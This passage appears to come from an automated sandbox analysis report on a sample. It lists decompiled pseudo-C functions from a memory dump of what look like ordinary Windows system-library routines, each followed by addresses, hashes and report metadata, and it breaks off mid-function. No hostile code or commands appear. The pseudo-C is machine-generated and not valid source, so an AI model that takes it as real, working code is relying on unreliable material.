			E03619240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x36ef708);
				E0366D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E036595D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E036595D0();
				_t33 =  *0x37084c4; // 0x0
				L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x37084c4; // 0x0
				L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x37084c4; // 0x0
				E03632280(L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x37086b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E036595D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E036595D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E03619325();
					_t50 =  *0x37084c4; // 0x0
					return E0366D0D1(L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x03619240
0x03619242
0x03619247
0x0361924c
0x0361924e
0x03619255
0x03619257
0x0361925a
0x0361925f
0x0361925f
0x03619266
0x03619271
0x03619276
0x03619279
0x0361927e
0x03619295
0x0361929a
0x036192b1
0x036192b6
0x036192d7
0x036192dc
0x036192e0
0x036192e6
0x036192e8
0x036192ee
0x03619332
0x03619333
0x03619337
0x03619338
0x0361933a
0x0361933a
0x0361933d
0x03619342
0x03619342
0x03619345
0x03619349
0x0361934e
0x03619352
0x03619357
0x036192f4
0x036192f4
0x036192f6
0x036192f9
0x03619300
0x03619306
0x03619324
0x03619324

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 061efce802b7c1434c5f0e764d12f7f13539c1dc10378f89fd22e3429ddf0e3c
Instruction ID: b42dc4dcc9cc8c77e0bf265ef7356aef66e7ca689e4e937c8275f559c7f0d414
Opcode Fuzzy Hash: 061efce802b7c1434c5f0e764d12f7f13539c1dc10378f89fd22e3429ddf0e3c
Instruction Fuzzy Hash: 9F213775141B00EFC761EF28CA50F1AB7F9BF08704F19456CE04A8A6A2CB34EA51CB88

Uniqueness

Uniqueness Score: -1.00%

Function 036A4257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E036A4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x36f08d0);
				E0366D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E036A41E8(__ebx, __edi, __ecx, _t39);
				E0362EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x37087e4;
					_t18 =  *0x37087e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x3705cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x37087e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x37087e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L03617055(_t31 + 0xfffffff8);
								_t24 =  *0x37087e0; // 0x0
								_t18 = _t24 - 1;
								 *0x37087e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x3705cd0;
				if( *0x3705cd0 <= 0) {
					L03617055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x37087e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x37087e8 = _t30;
						 *0x37087e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0366D0D1(L036A4320());
			}

0x036a4257
0x036a4257
0x036a4257
0x036a4259
0x036a425e
0x036a4263
0x036a4265
0x036a4273
0x036a4278
0x036a427c
0x036a427f
0x036a4281
0x036a4287
0x036a42d7
0x036a42d7
0x036a42da
0x036a428d
0x036a428d
0x036a428f
0x036a4292
0x036a4297
0x036a429c
0x036a42a0
0x036a42a6
0x036a42a8
0x036a42ae
0x036a42b3
0x00000000
0x036a42ba
0x036a42ba
0x036a42bf
0x036a42c5
0x036a42ca
0x036a42cf
0x036a42d0
0x00000000
0x036a42d0
0x036a42b3
0x00000000
0x036a42a6
0x036a429c
0x036a42dc
0x036a42dc
0x036a42e3
0x036a4309
0x036a42e5
0x036a42e5
0x036a42e8
0x036a42ee
0x036a42f0
0x00000000
0x036a42f2
0x036a42f2
0x036a42f4
0x036a42f7
0x036a42f9
0x036a4300
0x036a4300
0x036a42f0
0x036a430e
0x036a431f

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c15f0a40f521898b1b011330c898f6b944dabc808f402d6cf0c99914ba150674
Instruction ID: 65c9f4b124441ae731a9d62ba502f62fada781dce498b4532aece1c97c36d7a1
Opcode Fuzzy Hash: c15f0a40f521898b1b011330c898f6b944dabc808f402d6cf0c99914ba150674
Instruction Fuzzy Hash: CF214C74501B01DFC716EF6AD900614B7E1FF89319B54D2AEC1158B358DF759841CF49

Uniqueness

Uniqueness Score: -1.00%

Function 03642397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E03642397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x370848c != 0) {
					L0363FAD0(0x3708610);
					if( *0x370848c == 0) {
						E0363FA00(0x3708610, _t19, _t27, 0x3708610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E03642581(0x3708610, 0x35f50a0, _t26, _t27, _t28);
						E0363FA00(0x3708610, 0x35f50a0, _t27, 0x3708610);
					}
				} else {
					L1:
					_t11 =  *0x3708614; // 0x1
					if(_t11 == 0) {
						_t11 = E03654886(0x35f1088, 1, 0x3708614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E03642581(0x3708610, (_t11 << 4) + 0x35f5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x036423b0
0x036423b6
0x03642409
0x03642415
0x03685ae9
0x00000000
0x0364241b
0x0364241b
0x0364241d
0x03642427
0x0364242e
0x03642430
0x03642430
0x036423b8
0x036423b8
0x036423b8
0x036423bf
0x036423fc
0x036423fc
0x036423c1
0x036423c3
0x036423d0
0x036423d8
0x036423d8
0x036423dc
0x036423de
0x036423e1
0x036423e1
0x036423ec

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b3242387fbe89a34dfddc4245edb8cca9be49b4bd356e203487456fa369bc32
Instruction ID: e15fb3734eb116dbcde68508e2588ab37c1cc99fbf943997799cd08d13edd80f
Opcode Fuzzy Hash: 5b3242387fbe89a34dfddc4245edb8cca9be49b4bd356e203487456fa369bc32
Instruction Fuzzy Hash: 8A112B31B00304EBD721EA2AAC90B19B7DCEB50710F28882AF6029F391DAF4D841875D

Uniqueness

Uniqueness Score: -1.00%

Function 036946A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E036946A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L03634620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0365F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0364D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L036377F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x036946b7
0x036946ba
0x036946c5
0x036946c8
0x036946d0
0x036946d4
0x036946e6
0x036946e9
0x036946f4
0x036946ff
0x03694705
0x03694706
0x0369470c
0x03694713
0x0369471b
0x03694723
0x03694725
0x036946d6
0x036946d9
0x036946db
0x036946db
0x03694732

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: ecc1c7a871264bc0b821e477c70361d853f18da83d0e8b591aefe82cb8a71d38
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: BA11C276904208BBCB06DF5D98808BEB7B9EF96300F1080AEF9448B351DA318D55D7A8

Uniqueness

Uniqueness Score: -1.00%

Function 036537F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E036537F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E03632280(_t6, 0x3708550);
				}
				_t29 = E0365387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0362FFB0(0x3708550, _t27, 0x3708550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x036537fa
0x036537fc
0x03653805
0x03653808
0x03653808
0x03653814
0x03653818
0x03653846
0x03653848
0x0365384b
0x0365384b
0x03653852
0x00000000
0x03653854
0x03653856
0x00000000
0x00000000
0x03653863
0x00000000
0x03653863
0x0365381a
0x0365381a
0x0365381f
0x0365386e
0x0365386e
0x03653871
0x03653873
0x03653873
0x03653868
0x00000000
0x03653868
0x03653821
0x03653826
0x00000000
0x00000000
0x03653828
0x0365382a
0x03653841
0x00000000
0x03653841

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e1eecb293900b0f68b712179f73b4cbecc75aec35ddf6e098cae7c975c2baf4
Instruction ID: 7e16a30a92529526d38871ac31844fa6311ce03704441c4b022e32e63ca06b65
Opcode Fuzzy Hash: 5e1eecb293900b0f68b712179f73b4cbecc75aec35ddf6e098cae7c975c2baf4
Instruction Fuzzy Hash: EF01C879A016109BC32BCA59DA40B26BBAADF85F90F2940BDFC458B310D730D801C784

Uniqueness

Uniqueness Score: -1.00%

Function 0361C962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0361C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x370d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0362EEF0(0x37070a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0369F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0362EB70(_t29, 0x37070a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0365B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0369F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x37070c0; // 0x0
					while(_t38 != 0x37070c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x370b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x0361c96a
0x0361c974
0x0361c988
0x0361c98a
0x03687c9d
0x03687c9f
0x03687ca4
0x03687cae
0x03687cf0
0x03687cf5
0x03687cfa
0x0361c992
0x0361c996
0x0361c997
0x0361c998
0x0361c9a3
0x0361c9a3
0x03687cb0
0x03687cb7
0x03687cbb
0x00000000
0x00000000
0x03687cbd
0x03687ce8
0x03687cc5
0x03687cc8
0x03687cca
0x03687cd0
0x03687cd6
0x03687cde
0x03687ce4
0x03687ce4
0x03687cd0
0x00000000
0x03687ce8
0x0361c990
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64371313e3e47e2a75a5bbb79e5b65d47d4f57bf7f96e09340d1e13ce4956cd2
Instruction ID: 55f4d1833a4926f3635a7253700a09026ce82e2f583cb078e03ba734f4e6fa79
Opcode Fuzzy Hash: 64371313e3e47e2a75a5bbb79e5b65d47d4f57bf7f96e09340d1e13ce4956cd2
Instruction Fuzzy Hash: 5811C23230074ADFCB14FF69D985A2ABBE5BB89614B15063DF8518B650DF60EC10C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 0364002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0364002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E03637D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E03637D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E03637D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E03637D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x03640032
0x03640037
0x03640043
0x03684b3a
0x03640049
0x03640049
0x03640049
0x0364004e
0x03640053
0x03684b48
0x03684b5a
0x03684b4a
0x03684b53
0x03684b53
0x03684b5f
0x00000000
0x03684b61
0x00000000
0x03684b61
0x03640059
0x03640059
0x03640060
0x03684b6f
0x03684b6f
0x03640069
0x03684b83
0x00000000
0x00000000
0x03684b90
0x03684b9b
0x03684b9b
0x03684ba4
0x00000000
0x00000000
0x03684baa
0x00000000
0x0364006f
0x0364006f
0x00000000
0x0364006f
0x03640069

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: e2c53e357bb078fb1f365a7f9fe7fd17992dd04cb8f226736977fb9cc4c485bc
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: F311C476A067928FD723E72DDA44B35B7E8EF45B54F0D01E0DE049B792DB28D842C264

Uniqueness

Uniqueness Score: -1.00%

Function 0362766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0362766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0364F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0364F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L03634620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x03627672
0x0362767f
0x03627689
0x036276de
0x036276de
0x0362768b
0x03627691
0x03627693
0x03627697
0x00000000
0x03627699
0x036276a8
0x00000000
0x036276aa
0x036276ad
0x036276b1
0x00000000
0x036276b3
0x036276b3
0x036276b5
0x036276ba
0x036276bc
0x036276bc
0x036276c0
0x00000000
0x036276c2
0x036276ce
0x036276ce
0x036276c0
0x036276b1
0x036276a8
0x03627697
0x036276d9

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: d36471752acb81143ed390f6b88367796485c167f9f4a3f980422522500c424d
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 9601AC32700529ABC721DE9ECD41E5BFFADEB85660F390564B908DF251DA30DD11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 036AC450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E036AC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E03659910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E036595B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E036595D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E036595D0();
				return L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x036ac458
0x036ac45d
0x036ac466
0x036ac468
0x036ac469
0x036ac46a
0x036ac46b
0x036ac46e
0x036ac46f
0x036ac471
0x036ac476
0x036ac476
0x036ac47c
0x036ac47e
0x036ac480
0x036ac480
0x036ac483
0x036ac484
0x036ac486
0x036ac488
0x036ac48f
0x036ac491
0x036ac493
0x036ac493
0x036ac48f
0x036ac498
0x036ac49e
0x036ac4ad
0x036ac4ad
0x036ac4b2
0x036ac4b4
0x036ac4cd

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: a17c78c20e6f624013987d2ca4d06f4bd79d0f7c50c8a80a81c84a07ef60a7a3
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 53019276140A09FFD721EF69CD80E62F7BDFF55390F044529F51586660CB21ACA0CAB8

Uniqueness

Uniqueness Score: -1.00%

Function 03619080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E03619080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x37085ec;
				E03632280(_t48, 0x37085ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0362FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x370538c; // 0x77f06888
					if( *_t84 != 0x3705388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x36ef6e8);
						E0366D0E8(0x37085ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E036E88F5(_t80, _t85, 0x3705388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x37086c0; // 0x2bb07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x37086b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E03632280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E036E88F5(0x37085ec, _t85, 0x3705388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0365AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
